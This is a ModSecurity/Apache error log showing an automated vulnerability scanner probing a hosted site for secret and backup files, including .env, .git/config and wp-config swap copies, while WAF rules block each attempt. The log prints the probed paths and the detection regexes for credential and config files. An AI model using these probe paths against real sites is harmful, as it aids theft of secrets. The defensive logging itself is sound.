[Tue May 26 13:04:07.973097 2026] [security2:error] [pid 470766:tid 471000] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DqQAAAGg"]
[Tue May 26 13:04:07.976385 2026] [security2:error] [pid 470766:tid 470998] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4D3gAAAGY"]
[Tue May 26 13:04:07.980368 2026] [security2:error] [pid 470766:tid 470965] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4D3wAAAEU"]
[Tue May 26 13:04:07.991534 2026] [security2:error] [pid 470766:tid 470943] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4D4gAAAC8"]
[Tue May 26 13:04:08.004264 2026] [security2:error] [pid 470766:tid 470985] [client 195.178.110.199:43316] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/.env.php"] [unique_id "ahVM8OjO_W1DqEcFHQ4D6QAAAFk"]
[Tue May 26 13:04:08.028442 2026] [security2:error] [pid 470766:tid 470940] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4D6AAAACw"]
[Tue May 26 13:04:08.036468 2026] [security2:error] [pid 470766:tid 470945] [client 195.178.110.199:43422] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.env.swp"] [unique_id "ahVM8OjO_W1DqEcFHQ4D7AAAADE"]
[Tue May 26 13:04:08.130302 2026] [security2:error] [pid 470766:tid 471015] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8OjO_W1DqEcFHQ4D8QAAAHc"]
[Tue May 26 13:04:08.131856 2026] [security2:error] [pid 470766:tid 470916] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8OjO_W1DqEcFHQ4D8wAAABQ"]
[Tue May 26 13:04:08.144861 2026] [security2:error] [pid 470766:tid 470988] [client 195.178.110.199:43268] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.git/config.old"] [unique_id "ahVM8OjO_W1DqEcFHQ4D9wAAAFw"]
[Tue May 26 13:04:08.183022 2026] [security2:error] [pid 470766:tid 470995] [client 195.178.110.199:43348] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.env~"] [unique_id "ahVM8OjO_W1DqEcFHQ4D_wAAAGM"]
[Tue May 26 13:04:08.221978 2026] [security2:error] [pid 470766:tid 471023] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8OjO_W1DqEcFHQ4EAgAAAH8"]
[Tue May 26 13:04:08.312074 2026] [security2:error] [pid 470766:tid 470897] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8OjO_W1DqEcFHQ4EBQAAAAE"]
[Tue May 26 13:04:08.367114 2026] [security2:error] [pid 470766:tid 470974] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8OjO_W1DqEcFHQ4ECwAAAE4"]
[Tue May 26 13:04:08.372579 2026] [security2:error] [pid 470766:tid 470975] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8OjO_W1DqEcFHQ4ECgAAAE8"]
[Tue May 26 13:04:08.402567 2026] [security2:error] [pid 470766:tid 470934] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8OjO_W1DqEcFHQ4EEAAAACY"]
[Tue May 26 13:04:08.404573 2026] [security2:error] [pid 470766:tid 470928] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8OjO_W1DqEcFHQ4EFAAAACA"]
[Tue May 26 13:04:08.417322 2026] [security2:error] [pid 470766:tid 470912] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8OjO_W1DqEcFHQ4EGQAAABA"]
[Tue May 26 13:04:08.726669 2026] [security2:error] [pid 470766:tid 470899] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8OjO_W1DqEcFHQ4EJgAAAAM"]
[Tue May 26 13:04:08.802866 2026] [security2:error] [pid 470766:tid 471007] [client 195.178.110.199:43300] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.git/config.bak"] [unique_id "ahVM8OjO_W1DqEcFHQ4EMAAAAG8"]
[Tue May 26 13:04:08.909370 2026] [security2:error] [pid 470766:tid 470958] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8OjO_W1DqEcFHQ4ENgAAAD4"]
[Tue May 26 13:04:08.943105 2026] [security2:error] [pid 470766:tid 470931] [client 195.178.110.199:43358] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.git/config~"] [unique_id "ahVM8OjO_W1DqEcFHQ4EPQAAACM"]
[Tue May 26 13:04:09.059503 2026] [security2:error] [pid 470766:tid 470944] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ejO_W1DqEcFHQ4EQAAAADA"]
[Tue May 26 13:04:09.107234 2026] [security2:error] [pid 470766:tid 470932] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ejO_W1DqEcFHQ4EQwAAACQ"]
[Tue May 26 13:04:09.757388 2026] [security2:error] [pid 470766:tid 470908] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ejO_W1DqEcFHQ4EZAAAAAw"]
[Tue May 26 13:04:09.768653 2026] [security2:error] [pid 470766:tid 470899] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ejO_W1DqEcFHQ4EZwAAAAM"]
[Tue May 26 13:04:09.811472 2026] [security2:error] [pid 470766:tid 470970] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ejO_W1DqEcFHQ4EawAAAEo"]
[Tue May 26 13:04:09.844826 2026] [security2:error] [pid 470766:tid 471016] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ejO_W1DqEcFHQ4EcgAAAHg"]
[Tue May 26 13:04:09.900302 2026] [security2:error] [pid 470766:tid 470938] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ejO_W1DqEcFHQ4EfAAAACo"]
[Tue May 26 13:04:09.904120 2026] [security2:error] [pid 470766:tid 470930] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ejO_W1DqEcFHQ4EfQAAACI"]
[Tue May 26 13:04:09.931812 2026] [security2:error] [pid 470766:tid 470902] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ejO_W1DqEcFHQ4EggAAAAY"]
[Tue May 26 13:04:10.009004 2026] [security2:error] [pid 470766:tid 470967] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ejO_W1DqEcFHQ4EhQAAAEc"]
[Tue May 26 13:04:10.231227 2026] [security2:error] [pid 470766:tid 471017] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4EiwAAAHk"]
[Tue May 26 13:04:10.236350 2026] [security2:error] [pid 470766:tid 470919] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4EjgAAABc"]
[Tue May 26 13:04:10.246299 2026] [security2:error] [pid 470766:tid 471003] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4EkQAAAGs"]
[Tue May 26 13:04:10.248304 2026] [security2:error] [pid 470766:tid 470926] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4ElAAAAB4"]
[Tue May 26 13:04:10.279714 2026] [security2:error] [pid 470766:tid 470924] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4EmgAAABw"]
[Tue May 26 13:04:10.298915 2026] [security2:error] [pid 470766:tid 470966] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4EogAAAEY"]
[Tue May 26 13:04:10.302572 2026] [security2:error] [pid 470766:tid 470994] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4EowAAAGI"]
[Tue May 26 13:04:10.311067 2026] [security2:error] [pid 470766:tid 470935] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4EpgAAACc"]
[Tue May 26 13:04:10.342257 2026] [security2:error] [pid 470766:tid 470958] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4ErAAAAD4"]
[Tue May 26 13:04:10.436537 2026] [security2:error] [pid 470766:tid 470998] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4EtAAAAGY"]
[Tue May 26 13:04:10.480879 2026] [security2:error] [pid 470766:tid 470944] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4EvQAAADA"]
[Tue May 26 13:04:10.483297 2026] [security2:error] [pid 470766:tid 470986] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4EvwAAAFo"]
[Tue May 26 13:04:10.529192 2026] [security2:error] [pid 470766:tid 470967] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4EwwAAAEc"]
[Tue May 26 13:04:10.537972 2026] [security2:error] [pid 470766:tid 470943] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4ExwAAAC8"]
[Tue May 26 13:04:10.585237 2026] [security2:error] [pid 470766:tid 470945] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4EywAAADE"]
[Tue May 26 13:04:10.642849 2026] [security2:error] [pid 470766:tid 470950] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4E0wAAADY"]
[Tue May 26 13:04:10.642895 2026] [security2:error] [pid 470766:tid 471005] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4E1QAAAG0"]
[Tue May 26 13:04:10.683107 2026] [security2:error] [pid 470766:tid 471021] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4E2gAAAH0"]
[Tue May 26 13:04:10.692548 2026] [security2:error] [pid 470766:tid 470996] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4E3QAAAGQ"]
[Tue May 26 13:04:10.701262 2026] [security2:error] [pid 470766:tid 470964] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4E4AAAAEQ"]
[Tue May 26 13:04:10.739870 2026] [security2:error] [pid 470766:tid 470989] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4E5QAAAF0"]
[Tue May 26 13:04:10.746797 2026] [security2:error] [pid 470766:tid 470936] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4E5gAAACg"]
[Tue May 26 13:04:10.762161 2026] [security2:error] [pid 470766:tid 470951] [client 195.178.110.199:43358] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4E6QAAADc"]
[Tue May 26 13:04:10.766848 2026] [security2:error] [pid 470766:tid 470961] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4E6gAAAEE"]
[Tue May 26 13:04:10.769602 2026] [security2:error] [pid 470766:tid 470924] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4E7QAAABw"]
[Tue May 26 13:04:10.810871 2026] [security2:error] [pid 470766:tid 470910] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4E8wAAAA4"]
[Tue May 26 13:04:10.828881 2026] [autoindex:error] [pid 470766:tid 470921] [client 195.178.110.199:0] AH01276: Cannot serve directory /home1/vcress4h/public_html/.well-known/acme-challenge/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:04:10.873808 2026] [security2:error] [pid 470766:tid 470916] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4E_wAAABQ"]
[Tue May 26 13:04:10.940781 2026] [security2:error] [pid 470766:tid 470902] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4FAgAAAAY"]
[Tue May 26 13:04:11.015061 2026] [security2:error] [pid 470766:tid 471023] [client 195.178.110.199:43332] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/ADMIN/.env"] [unique_id "ahVM8-jO_W1DqEcFHQ4FBgAAAH8"]
[Tue May 26 13:04:11.046004 2026] [security2:error] [pid 470766:tid 470906] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4EzgAAAAo"]
[Tue May 26 13:04:11.191777 2026] [security2:error] [pid 470766:tid 470983] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8-jO_W1DqEcFHQ4FDgAAAFc"]
[Tue May 26 13:04:11.206661 2026] [security2:error] [pid 470766:tid 470962] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8-jO_W1DqEcFHQ4FEgAAAEI"]
[Tue May 26 13:04:11.261205 2026] [security2:error] [pid 470766:tid 471009] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8-jO_W1DqEcFHQ4FFQAAAHE"]
[Tue May 26 13:04:11.267951 2026] [security2:error] [pid 470766:tid 471014] [client 195.178.110.199:43312] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/.wp-config.php.swp"] [unique_id "ahVM8-jO_W1DqEcFHQ4FFgAAAHY"]
[Tue May 26 13:04:11.355983 2026] [security2:error] [pid 470766:tid 470953] [client 195.178.110.199:43290] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/APP/.env"] [unique_id "ahVM8-jO_W1DqEcFHQ4FJwAAADk"]
